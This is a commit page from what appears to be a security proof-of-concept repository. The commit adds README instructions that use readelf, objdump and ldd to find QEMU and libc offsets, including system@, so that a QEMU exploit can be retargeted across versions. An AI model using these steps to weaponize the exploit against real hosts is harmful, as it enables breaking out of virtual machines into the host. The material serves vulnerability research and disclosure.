milliways-infosec/fragnesia
5
0
Fork 0
mirror of https://github.com/v12-security/pocs.git synced 2026-05-16 11:07:43 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

MAKE IT USER FRIENDLY!!!!!!!!!!!!

Browse source
This commit is contained in:
stong 2026-05-16 04:51:21 +09:00
parent 8852a0f1c1
commit 454b5f9517
1 changed files with 9 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

9
qemu/README.md
View file

@ -33,6 +33,15 @@ The exploit can be weaponized to work reliably across many QEMU versions using t
QEMU + Mutiny. QEMU + Mutiny.
## Offsets (USER FRIENDLY VERSION)
- Replace `0x047E735` with `$(readelf -s qemu-system-x86_64 | grep cmd_logs_get_log | awk '{print $2}')`
- Replace `0x0341BB0` with `$(objdump -S qemu-system-x86_64 | grep "<memmove@plt>:" | awk '{print $1}')`
- Replace `0x01E72FF8` with `$(objdump -S qemu-system-x86_64 | grep "libc_start_main" | awk '{print $(NF-1)}')`
- Find libc: `ldd ./qemu-system-x86_64 | grep libc.so`
- Replace `0x2A200` with `readelf -sW /lib/x86_64-linux-gnu/libc.so.6 | grep -i __libc_start_main | awk '{print $2}'`
- Replace `0x058750` with `readelf -sW /lib/x86_64-linux-gnu/libc.so.6 | grep -i system@ | awk '{print $2}'`
## Building ## Building
``` ```